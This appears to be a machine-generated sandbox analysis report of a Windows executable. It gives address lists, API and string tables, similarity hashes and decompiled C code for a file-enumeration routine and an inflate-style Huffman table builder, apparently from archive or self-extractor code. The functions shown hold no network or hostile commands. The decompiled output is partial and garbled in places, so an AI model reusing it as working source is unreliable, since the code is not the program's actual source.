                                                                                                                0x00ec82d1
                                                                                                                0x00ec82d9
                                                                                                                0x00ec82da
                                                                                                                0x00ec82e1
                                                                                                                0x00ec82f2
                                                                                                                0x00ec82f2
                                                                                                                0x00ec8319
                                                                                                                0x00ec832e
                                                                                                                0x00ec8336
                                                                                                                0x00ec8336
                                                                                                                0x00ec8358
                                                                                                                0x00ec835d
                                                                                                                0x00ec8364
                                                                                                                0x00ec8367
                                                                                                                0x00ec836a
                                                                                                                0x00ec836f
                                                                                                                0x00ec8372
                                                                                                                0x00ec8375
                                                                                                                0x00ec837b
                                                                                                                0x00ec837f
                                                                                                                0x00ec8383
                                                                                                                0x00ec838e
                                                                                                                0x00ec838f
                                                                                                                0x00ec8395
                                                                                                                0x00ec839a
                                                                                                                0x00ec83a1
                                                                                                                0x00ec83a9
                                                                                                                0x00ec83b3
                                                                                                                0x00ec83b5
                                                                                                                0x00000000
                                                                                                                0x00ec84db
                                                                                                                0x00ec84db
                                                                                                                0x00ec84db
                                                                                                                0x00ec84de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec84af
                                                                                                                0x00ec84b2
                                                                                                                0x00ec84bb
                                                                                                                0x00ec84c1
                                                                                                                0x00ec84c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec84c9
                                                                                                                0x00ec84cd
                                                                                                                0x00ec84f6
                                                                                                                0x00ec84fa
                                                                                                                0x00ec83b8
                                                                                                                0x00ec83be
                                                                                                                0x00ec83c5
                                                                                                                0x00ec83d6
                                                                                                                0x00ec83db
                                                                                                                0x00ec83ef
                                                                                                                0x00ec8400
                                                                                                                0x00ec840a
                                                                                                                0x00ec841b
                                                                                                                0x00ec841b
                                                                                                                0x00ec8422
                                                                                                                0x00ec842b
                                                                                                                0x00ec8434
                                                                                                                0x00ec843a
                                                                                                                0x00ec843f
                                                                                                                0x00ec8445
                                                                                                                0x00ec844a
                                                                                                                0x00ec8450
                                                                                                                0x00ec8507
                                                                                                                0x00ec8507
                                                                                                                0x00ec850a
                                                                                                                0x00000000
                                                                                                                0x00ec8477
                                                                                                                0x00ec847e
                                                                                                                0x00ec8504
                                                                                                                0x00ec8504
                                                                                                                0x00ec8504
                                                                                                                0x00000000
                                                                                                                0x00ec8504
                                                                                                                0x00ec848f
                                                                                                                0x00ec849a
                                                                                                                0x00ec849b
                                                                                                                0x00ec849e
                                                                                                                0x00ec84a1
                                                                                                                0x00ec850d
                                                                                                                0x00ec850d
                                                                                                                0x00ec8511
                                                                                                                0x00ec8517
                                                                                                                0x00ec851a
                                                                                                                0x00ec851d
                                                                                                                0x00ec8521
                                                                                                                0x00000000
                                                                                                                0x00ec8521
                                                                                                                0x00ec8450
                                                                                                                0x00ec84d4
                                                                                                                0x00ec84d7
                                                                                                                0x00ec84d9
                                                                                                                0x00ec84d9
                                                                                                                0x00ec84d9
                                                                                                                0x00000000
                                                                                                                0x00ec84e0
                                                                                                                0x00ec83a9
                                                                                                                0x00ec82e5
                                                                                                                0x00ec82e7
                                                                                                                0x00ec82e7
                                                                                                                0x00ec82ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec8290
                                                                                                                0x00ec8292
                                                                                                                0x00ec8294
                                                                                                                0x00ec8294
                                                                                                                0x00ec8299
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec8299
                                                                                                                0x00ec826a
                                                                                                                0x00ec826c
                                                                                                                0x00ec826e
                                                                                                                0x00ec826e
                                                                                                                0x00ec8273
                                                                                                                0x00ec852b
                                                                                                                0x00ec8537
                                                                                                                0x00000000
                                                                                                                0x00ec8537
                                                                                                                0x00000000
                                                                                                                0x00ec8273
                                                                                                                0x00ec8268
                                                                                                                0x00ec85b9
                                                                                                                0x00ec85b9
                                                                                                                0x00000000
                                                                                                                0x00ec85b9
                                                                                                                0x00ec9018
                                                                                                                0x00ec902b
                                                                                                                0x00ec9030
                                                                                                                0x00ec9032
                                                                                                                0x00ec90b0
                                                                                                                0x00ec90b0
                                                                                                                0x00ec90b5
                                                                                                                0x00ec90b7
                                                                                                                0x00ec90b9
                                                                                                                0x00ec90bd
                                                                                                                0x00ec90bf
                                                                                                                0x00ec90c5
                                                                                                                0x00ec90d1
                                                                                                                0x00ec90d6
                                                                                                                0x00ec90d8
                                                                                                                0x00ec90da
                                                                                                                0x00ec90da
                                                                                                                0x00ec90da
                                                                                                                0x00ec90d8
                                                                                                                0x00ec90c5
                                                                                                                0x00ec90bd
                                                                                                                0x00ec90de
                                                                                                                0x00ec90df
                                                                                                                0x00ec90e6
                                                                                                                0x00ec90ea
                                                                                                                0x00ec90eb
                                                                                                                0x00ec90f2
                                                                                                                0x00ec90fb
                                                                                                                0x00ec9107
                                                                                                                0x00ec9107
                                                                                                                0x00ec90f2
                                                                                                                0x00ec910c
                                                                                                                0x00ec910e
                                                                                                                0x00ec9128
                                                                                                                0x00ec9128
                                                                                                                0x00ec912e
                                                                                                                0x00ec9130
                                                                                                                0x00ec913b
                                                                                                                0x00ec913e
                                                                                                                0x00ec9141
                                                                                                                0x00ec914d
                                                                                                                0x00ec914d
                                                                                                                0x00ec9150
                                                                                                                0x00ec9152
                                                                                                                0x00ec9154
                                                                                                                0x00ec9156
                                                                                                                0x00ec9156
                                                                                                                0x00ec9156
                                                                                                                0x00ec9154
                                                                                                                0x00000000
                                                                                                                0x00ec9150
                                                                                                                0x00ec9143
                                                                                                                0x00ec9146
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9148
                                                                                                                0x00ec914a
                                                                                                                0x00ec914a
                                                                                                                0x00000000
                                                                                                                0x00ec914a
                                                                                                                0x00ec9132
                                                                                                                0x00ec9135
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec9137
                                                                                                                0x00000000
                                                                                                                0x00ec9110
                                                                                                                0x00ec9110
                                                                                                                0x00ec9113
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec911b
                                                                                                                0x00ec911e
                                                                                                                0x00ec9123
                                                                                                                0x00ec9157
                                                                                                                0x00ec915d
                                                                                                                0x00ec9165
                                                                                                                0x00ec9170
                                                                                                                0x00ec9178
                                                                                                                0x00ec9180
                                                                                                                0x00ec918c
                                                                                                                0x00ec9198
                                                                                                                0x00ec9198
                                                                                                                0x00ec910e
                                                                                                                0x00ec9037
                                                                                                                0x00ec9037
                                                                                                                0x00ec903a
                                                                                                                0x00ec9040
                                                                                                                0x00ec9046
                                                                                                                0x00ec904c
                                                                                                                0x00ec9052
                                                                                                                0x00ec9057
                                                                                                                0x00ec905d
                                                                                                                0x00ec9067
                                                                                                                0x00ec906e
                                                                                                                0x00ec9076
                                                                                                                0x00ec907d
                                                                                                                0x00ec9085
                                                                                                                0x00ec9089
                                                                                                                0x00ec9090
                                                                                                                0x00ec9091
                                                                                                                0x00ec90a4
                                                                                                                0x00ec90a7
                                                                                                                0x00ec90ac
                                                                                                                0x00ec90ac
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __allrem$H_prolog_swprintf
                                                                                                                • String ID: AES-0017$SSSS.exe$z01$zip$zipx$zx01
                                                                                                                • API String ID: 3081616963-3163744553
                                                                                                                • Opcode ID: ab1235e7169172b78c598f368b0cc62288c4b9ddb08cc7860b4c0d056937f242
                                                                                                                • Instruction ID: 889598e5d93a4d992cef210234c426853c5e3d9595c753173c7e3d7760d338a4
                                                                                                                • Opcode Fuzzy Hash: ab1235e7169172b78c598f368b0cc62288c4b9ddb08cc7860b4c0d056937f242
                                                                                                                • Instruction Fuzzy Hash: 63A27971A002489FCB24DF24DF45FAA77E5BB48304F18616EF805F72A1EB729982DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC29A3, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E00EC29A3(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E00ED3370();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E00EC674F(_t83, _a4696, 0x800);
						_push(0x800);
						E00EC377F(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00EC71FF(_t83 + 0x1010, _t81,  &_v4);
						E00EC71FF(_t83 + 0x1018, _t81,  &_v24);
						E00EC71FF(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E00EC3399(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t86 = _t73;
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}






















                                                                                                                0x00ec29a3
                                                                                                                0x00ec29a8
                                                                                                                0x00ec29ad
                                                                                                                0x00ec29b0
                                                                                                                0x00ec29bc
                                                                                                                0x00ec29c3
                                                                                                                0x00ec29cb
                                                                                                                0x00ec29ce
                                                                                                                0x00ec2a41
                                                                                                                0x00ec2a47
                                                                                                                0x00ec2a49
                                                                                                                0x00ec2a4b
                                                                                                                0x00ec2a4d
                                                                                                                0x00ec2a53
                                                                                                                0x00ec2a56
                                                                                                                0x00ec2a56
                                                                                                                0x00ec2a59
                                                                                                                0x00ec2a59
                                                                                                                0x00ec2a5f
                                                                                                                0x00ec2a61
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec29d0
                                                                                                                0x00ec29d7
                                                                                                                0x00ec29dd
                                                                                                                0x00ec29e1
                                                                                                                0x00ec2a67
                                                                                                                0x00ec2a70
                                                                                                                0x00ec2a75
                                                                                                                0x00ec2a7c
                                                                                                                0x00ec2a87
                                                                                                                0x00ec2a87
                                                                                                                0x00ec2a8b
                                                                                                                0x00ec2a95
                                                                                                                0x00ec2a98
                                                                                                                0x00ec2aa2
                                                                                                                0x00ec2aac
                                                                                                                0x00ec2ab6
                                                                                                                0x00ec2ac0
                                                                                                                0x00ec2aca
                                                                                                                0x00ec2ad4
                                                                                                                0x00ec2ade
                                                                                                                0x00ec2aeb
                                                                                                                0x00ec2afb
                                                                                                                0x00ec2b0b
                                                                                                                0x00ec29e7
                                                                                                                0x00ec29fe
                                                                                                                0x00ec2a19
                                                                                                                0x00ec2a19
                                                                                                                0x00ec2a22
                                                                                                                0x00ec2a33
                                                                                                                0x00ec2a33
                                                                                                                0x00ec2a2e
                                                                                                                0x00ec2a30
                                                                                                                0x00ec2a30
                                                                                                                0x00ec2a35
                                                                                                                0x00ec2a00
                                                                                                                0x00ec2a0d
                                                                                                                0x00ec2a13
                                                                                                                0x00ec2a17
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec2a17
                                                                                                                0x00ec29fe
                                                                                                                0x00ec29e1
                                                                                                                0x00ec2b10
                                                                                                                0x00ec2b23

                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00EC289E,000000FF,?,?), ref: 00EC29D7
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00EC289E,000000FF,?,?), ref: 00EC2A0D
                                                                                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00EC289E,000000FF,?,?), ref: 00EC2A19
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,00EC289E,000000FF,?,?), ref: 00EC2A41
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00EC289E,000000FF,?,?), ref: 00EC2A4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                • String ID:
                                                                                                                • API String ID: 869497890-0
                                                                                                                • Opcode ID: 45ba4e5d10dc8e3aefcf0dfe6afd49cbe9206388e55102b70bbc9f4f801eca34
                                                                                                                • Instruction ID: 9b97ebfad4957862489da8895247ee9dcf61e7d920edfb26525c4d798c401a23
                                                                                                                • Opcode Fuzzy Hash: 45ba4e5d10dc8e3aefcf0dfe6afd49cbe9206388e55102b70bbc9f4f801eca34
                                                                                                                • Instruction Fuzzy Hash: 12417172508281AFC324EF34C984FDAF7E8BB48354F005A2EF6E9E3200D775A9558B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECA6AE, Relevance: 1.6, Strings: 1, Instructions: 354COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E00ECA6AE(signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int* _a28) {
				char _v1152;
				signed int _v1216;
				signed int _v1280;
				signed int _v1284;
				signed int _v1348;
				signed int _v1352;
				char _v1420;
				intOrPtr _v1424;
				signed int _v1428;
				signed int _v1432;
				signed int* _v1436;
				signed int _v1440;
				signed int _v1444;
				intOrPtr* _v1448;
				signed int _v1452;
				signed int _v1456;
				signed int _v1460;
				signed int _v1464;
				signed int* _v1468;
				char _v1471;
				char _v1472;
				signed int _v1476;
				signed int _v1480;
				signed int _v1484;
				intOrPtr* _v1488;
				signed int _v1492;
				void* __edi;
				signed int _t211;
				signed int* _t212;
				void* _t213;
				intOrPtr _t214;
				signed int _t218;
				intOrPtr* _t226;
				signed int _t227;
				signed int _t234;
				signed int* _t238;
				signed int _t240;
				signed int _t242;
				signed int _t258;
				void* _t263;
				signed int* _t265;
				signed int _t274;
				void* _t276;
				signed int* _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int* _t288;
				signed int _t289;
				signed int _t291;
				intOrPtr _t292;
				intOrPtr _t293;
				intOrPtr* _t297;
				intOrPtr _t298;
				signed int _t299;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				signed int _t314;
				intOrPtr _t317;
				intOrPtr* _t318;
				signed int _t320;
				intOrPtr* _t321;
				intOrPtr _t323;
				intOrPtr _t324;
				signed int _t325;
				char _t326;
				signed int _t327;
				signed int _t336;
				void* _t337;
				intOrPtr _t338;
				signed int _t339;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				intOrPtr _t345;
				signed int _t347;
				intOrPtr* _t348;
				signed int _t350;
				void* _t352;
				void* _t353;
				signed int* _t354;
				signed int* _t355;
				signed int* _t356;

				_t354 =  &_v1492;
				_t281 = _a4;
				_t345 = _a8;
				_t340 = 0x10;
				if(_t345 <= 0x100) {
					_v1440 = _t340;
				} else {
					_v1440 = _t281[0x100];
				}
				E00ED4440(0,  &_v1420, 0, 0x44);
				_t355 =  &(_t354[3]);
				_t288 = _t281;
				_t323 = _t345;
				do {
					_t211 =  *_t288;
					_t288 =  &(_t288[1]);
					 *((intOrPtr*)(_t355 + 0x58 + _t211 * 4)) =  *((intOrPtr*)(_t355 + 0x58 + _t211 * 4)) + 1;
					_t323 = _t323 - 1;
				} while (_t323 != 0);
				if(_v1420 != _t345) {
					_t347 = 1;
					_t289 = 1;
					while( *((intOrPtr*)(_t355 + 0x58 + _t289 * 4)) == 0) {
						_t289 = _t289 + 1;
						if(_t289 <= _t340) {
							continue;
						}
						break;
					}
					_t212 = _a28;
					_v1476 = _t289;
					if( *_t212 < _t289) {
						 *_t212 = _t289;
					}
					while( *((intOrPtr*)(_t355 + 0x58 + _t340 * 4)) == 0) {
						_t340 = _t340 - 1;
						if(_t340 != 0) {
							continue;
						}
						break;
					}
					_v1464 = _t340;
					if( *_t212 > _t340) {
						 *_t212 = _t340;
					}
					_t336 = _t347 << _t289;
					while(_t289 < _t340) {
						_t337 = _t336 -  *((intOrPtr*)(_t355 + 0x58 + _t289 * 4));
						if(_t337 < 0) {
							L31:
							_push(2);
							L32:
							_pop(_t213);
							return _t213;
						}
						_t289 = _t289 + 1;
						_t336 = _t337 + _t337;
					}
					_t291 = _t340 << 2;
					_v1460 = _t291;
					_t214 =  *((intOrPtr*)(_t355 + _t291 + 0x58));
					_t338 = _t336 - _t214;
					_v1424 = _t338;
					if(_t338 < 0) {
						goto L31;
					}
					 *((intOrPtr*)(_t355 + _t291 + 0x58)) = _t214 + _t338;
					_t292 = 0;
					_v1348 = _v1348 & 0;
					_t341 = _t340 - 1;
					if(_t341 == 0) {
						L24:
						E00ED4440(_t338,  &_v1152, 0, 0x480);
						_t324 = _a8;
						_t356 =  &(_t355[3]);
						_t293 = 0;
						do {
							_t342 =  *_t281;
							_t281 =  &(_t281[1]);
							if(_t342 != 0) {
								_t218 =  *(_t356 + 0x9c + _t342 * 4);
								 *((intOrPtr*)(_t356 + 0x164 + _t218 * 4)) = _t293;
								 *(_t356 + 0x9c + _t342 * 4) = _t218 + 1;
							}
							_t293 = _t293 + 1;
						} while (_t293 < _t324);
						_t282 = _v1476;
						_t343 = _t342 | 0xffffffff;
						_v1488 =  &_v1152;
						_v1452 = _t343;
						_v1432 =  *((intOrPtr*)(_t356 + _v1460 + 0x9c));
						_t325 = 0;
						_v1492 = 0;
						_v1352 = 0;
						_v1284 = 0;
						_v1480 = 0;
						_v1216 = 0;
						_v1456 = 0;
						_v1484 = 0;
						if(_t282 > _v1464) {
							L69:
							 *_a28 = _v1280;
							if(_t338 == 0 || _v1464 == _t347) {
								_t347 = 0;
							}
							return _t347;
						}
						_t226 =  &_v1420 + _t282 * 4;
						_v1436 = _a24;
						_t297 = _v1488;
						_v1448 = _t226;
						do {
							_t227 =  *_t226;
							while(_t227 != 0) {
								_v1444 = _t227;
								_v1460 = _t227 - 1;
								if(_t282 <=  *((intOrPtr*)(_t356 + 0xe4 + _t343 * 4)) + _t325) {
									L49:
									_v1471 = _t282 - _t325;
									_t234 = _t356 + 0x164 + _v1432 * 4;
									if(_t297 < _t234) {
										_t298 =  *_t297;
										if(_t298 >= _a12) {
											_t299 = _t298 - _a12;
											_v1488 = _v1488 + 4;
											_v1472 =  *((intOrPtr*)(_t299 + _a20));
											_t238 =  *((intOrPtr*)(_a16 + _t299 * 2));
										} else {
											_t321 = _v1488;
											_v1472 = (_t234 & 0xffffff00 | _t298 - 0x00000100 > 0x00000000) + 0x1f;
											_t238 =  *_t321;
											_v1488 = _t321 + 4;
										}
										_v1468 = _t238;
									} else {
										_v1472 = 0x63;
									}
									_t240 = _t347 << _t282 - _t325;
									_t284 = _v1492 >> _t325;
									_v1444 = _t240;
									if(_t284 >= _v1484) {
										L59:
										_t282 = _v1476;
										_t242 = _t347 << _t282 - 1;
										_t304 = _v1492;
										while((_t304 & _t242) != 0) {
											_t304 = _t304 ^ _t242;
											_t242 = _t242 >> 1;
										}
										_v1492 = _t304 ^ _t242;
										if(((_t347 << _t325) - 0x00000001 & _v1492) ==  *((intOrPtr*)(_t356 + 0x9c + _t343 * 4))) {
											L66:
											_t227 = _v1460;
											_t297 = _v1488;
											continue;
										}
										_t285 = _v1492;
										do {
											_t325 = _t325 -  *((intOrPtr*)(_t356 + 0xe0 + _t343 * 4));
											_t343 = _t343 - 1;
										} while (((_t347 << _t325) - 0x00000001 & _t285) !=  *((intOrPtr*)(_t356 + 0x9c + _t343 * 4)));
										_t282 = _v1476;
										_v1452 = _t343;
										_v1480 = _t325;
										goto L66;
									} else {
										_t320 = _v1444;
										_t326 = _v1472;
										_t344 = _v1484;
										_v1428 = _t240 << 3;
										_t339 = _v1428;
										_t348 = _v1456 + _t284 * 8;
										do {
											_t284 = _t284 + _t320;
											 *_t348 = _t326;
											_a4 = _v1468;
											_t348 = _t348 + _t339;
										} while (_t284 < _t344);
										_t325 = _v1480;
										_t338 = _v1424;
										_t347 = 1;
										_t343 = _v1452;
										goto L59;
									}
								} else {
									goto L34;
								}
								do {
									L34:
									_t327 = _t325 + ( &_v1280)[_t343];
									_t343 = _t343 + 1;
									_t258 = _v1464 - _t327;
									_v1480 = _t327;
									_t308 =  *_a28;
									_v1452 = _t343;
									_v1484 = _t258;
									if(_t258 > _t308) {
										_v1484 = _t308;
									}
									_t286 = _t282 - _t327;
									_t350 = _t347 << _t286;
									if(_t350 <= _v1444) {
										L41:
										_t310 = _v1440;
										if(_t327 + _t286 > _t310 && _t327 < _t310) {
											_t286 = _t310 - _t327;
										}
										_t347 = 1;
										_v1484 = 1;
										( &_v1280)[_t343] = _t286;
										_push(8 + (1 << _t286) * 8); // executed
										_t263 = E00EDA91B( &_v1280); // executed
										if(_t263 == 0) {
											if(_t343 != 0) {
												E00ECAB49(_v1216);
											}
											_push(3);
											goto L32;
										} else {
											goto L45;
										}
									} else {
										_t318 = _v1448;
										_t352 = _t350 + (_t258 | 0xffffffff) - _v1460;
										_t274 = _v1484;
										while(1) {
											_t286 = _t286 + 1;
											if(_t286 >= _t274) {
												goto L41;
											}
											_t353 = _t352 + _t352;
											_t318 = _t318 + 4;
											if(_t353 <=  *_t318) {
												goto L41;
											}
											_t352 = _t353 -  *_t318;
										}
										goto L41;
									}
									L45:
									_t105 = _t263 + 8; // 0x8
									_t314 = _t105;
									_t265 = _t263 + 4;
									_v1456 = _t314;
									_v1436 = _t265;
									 *(_t356 + 0x124 + _t343 * 4) = _t314;
									 *_v1436 = _t314;
									 *_t265 =  *_t265 & 0x00000000;
									if(_t343 != 0) {
										_v1468 = _t314;
										 *((intOrPtr*)(_t356 + 0x9c + _t343 * 4)) = _v1492;
										_t317 =  *((intOrPtr*)(_t356 + 0x120 + _t343 * 4));
										_v1471 =  *((intOrPtr*)(_t356 + 0xe0 + _t343 * 4));
										_v1472 = _t286 + 0x20;
										 *((intOrPtr*)(_t317 + 8)) = _v1472;
										 *(_t317 + 4 + (((1 << _v1480) - 0x00000001 & _v1492) >> _v1480 -  *((intOrPtr*)(_t356 + 0xe0 + _t343 * 4))) * 8) = _v1456;
									}
									_t325 = _v1480;
									_t282 = _v1476;
								} while (_t282 > _t325 + _t286);
								_t297 = _v1488;
								goto L49;
							}
							_t282 = _t282 + 1;
							_t226 = _v1448 + 4;
							_v1476 = _t282;
							_v1448 = _t226;
						} while (_t282 <= _v1464);
						goto L69;
					}
					_t276 = 0;
					do {
						_t292 = _t292 +  *((intOrPtr*)(_t355 + _t276 + 0x5c));
						_t276 = _t276 + 4;
						 *((intOrPtr*)(_t355 + _t276 + 0xa0)) = _t292;
						_t341 = _t341 - 1;
					} while (_t341 != 0);
					goto L24;
				}
				 *_a24 = 0;
				 *_a28 = 0;
				return 0;
			}


























































































                                                                                                                0x00eca6ae
                                                                                                                0x00eca6b5
                                                                                                                0x00eca6bd
                                                                                                                0x00eca6c8
                                                                                                                0x00eca6cf
                                                                                                                0x00eca6dd
                                                                                                                0x00eca6d1
                                                                                                                0x00eca6d7
                                                                                                                0x00eca6d7
                                                                                                                0x00eca6eb
                                                                                                                0x00eca6f0
                                                                                                                0x00eca6f3
                                                                                                                0x00eca6f5
                                                                                                                0x00eca6f7
                                                                                                                0x00eca6f7
                                                                                                                0x00eca6f9
                                                                                                                0x00eca6fc
                                                                                                                0x00eca700
                                                                                                                0x00eca700
                                                                                                                0x00eca709
                                                                                                                0x00eca726
                                                                                                                0x00eca727
                                                                                                                0x00eca729
                                                                                                                0x00eca72f
                                                                                                                0x00eca732
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca732
                                                                                                                0x00eca734
                                                                                                                0x00eca73b
                                                                                                                0x00eca741
                                                                                                                0x00eca743
                                                                                                                0x00eca743
                                                                                                                0x00eca745
                                                                                                                0x00eca74b
                                                                                                                0x00eca74e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca74e
                                                                                                                0x00eca750
                                                                                                                0x00eca756
                                                                                                                0x00eca758
                                                                                                                0x00eca758
                                                                                                                0x00eca75c
                                                                                                                0x00eca76d
                                                                                                                0x00eca760
                                                                                                                0x00eca764
                                                                                                                0x00eca870
                                                                                                                0x00eca870
                                                                                                                0x00eca872
                                                                                                                0x00eca872
                                                                                                                0x00000000
                                                                                                                0x00eca872
                                                                                                                0x00eca76a
                                                                                                                0x00eca76b
                                                                                                                0x00eca76b
                                                                                                                0x00eca773
                                                                                                                0x00eca776
                                                                                                                0x00eca77a
                                                                                                                0x00eca77e
                                                                                                                0x00eca780
                                                                                                                0x00eca784
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca78c
                                                                                                                0x00eca790
                                                                                                                0x00eca792
                                                                                                                0x00eca799
                                                                                                                0x00eca79c
                                                                                                                0x00eca7b3
                                                                                                                0x00eca7c2
                                                                                                                0x00eca7c7
                                                                                                                0x00eca7ce
                                                                                                                0x00eca7d1
                                                                                                                0x00eca7d3
                                                                                                                0x00eca7d3
                                                                                                                0x00eca7d5
                                                                                                                0x00eca7da
                                                                                                                0x00eca7dc
                                                                                                                0x00eca7e3
                                                                                                                0x00eca7eb
                                                                                                                0x00eca7eb
                                                                                                                0x00eca7f2
                                                                                                                0x00eca7f3
                                                                                                                0x00eca802
                                                                                                                0x00eca806
                                                                                                                0x00eca809
                                                                                                                0x00eca80d
                                                                                                                0x00eca818
                                                                                                                0x00eca81e
                                                                                                                0x00eca820
                                                                                                                0x00eca824
                                                                                                                0x00eca82b
                                                                                                                0x00eca832
                                                                                                                0x00eca836
                                                                                                                0x00eca83d
                                                                                                                0x00eca841
                                                                                                                0x00eca849
                                                                                                                0x00ecab07
                                                                                                                0x00ecab15
                                                                                                                0x00ecab19
                                                                                                                0x00ecab21
                                                                                                                0x00ecab21
                                                                                                                0x00000000
                                                                                                                0x00ecab23
                                                                                                                0x00eca85a
                                                                                                                0x00eca85d
                                                                                                                0x00eca861
                                                                                                                0x00eca865
                                                                                                                0x00eca869
                                                                                                                0x00eca869
                                                                                                                0x00ecaae5
                                                                                                                0x00eca878
                                                                                                                0x00eca87d
                                                                                                                0x00eca88c
                                                                                                                0x00eca9b5
                                                                                                                0x00eca9b9
                                                                                                                0x00eca9c1
                                                                                                                0x00eca9ca
                                                                                                                0x00eca9d3
                                                                                                                0x00eca9dc
                                                                                                                0x00eca9fd
                                                                                                                0x00ecaa0b
                                                                                                                0x00ecaa13
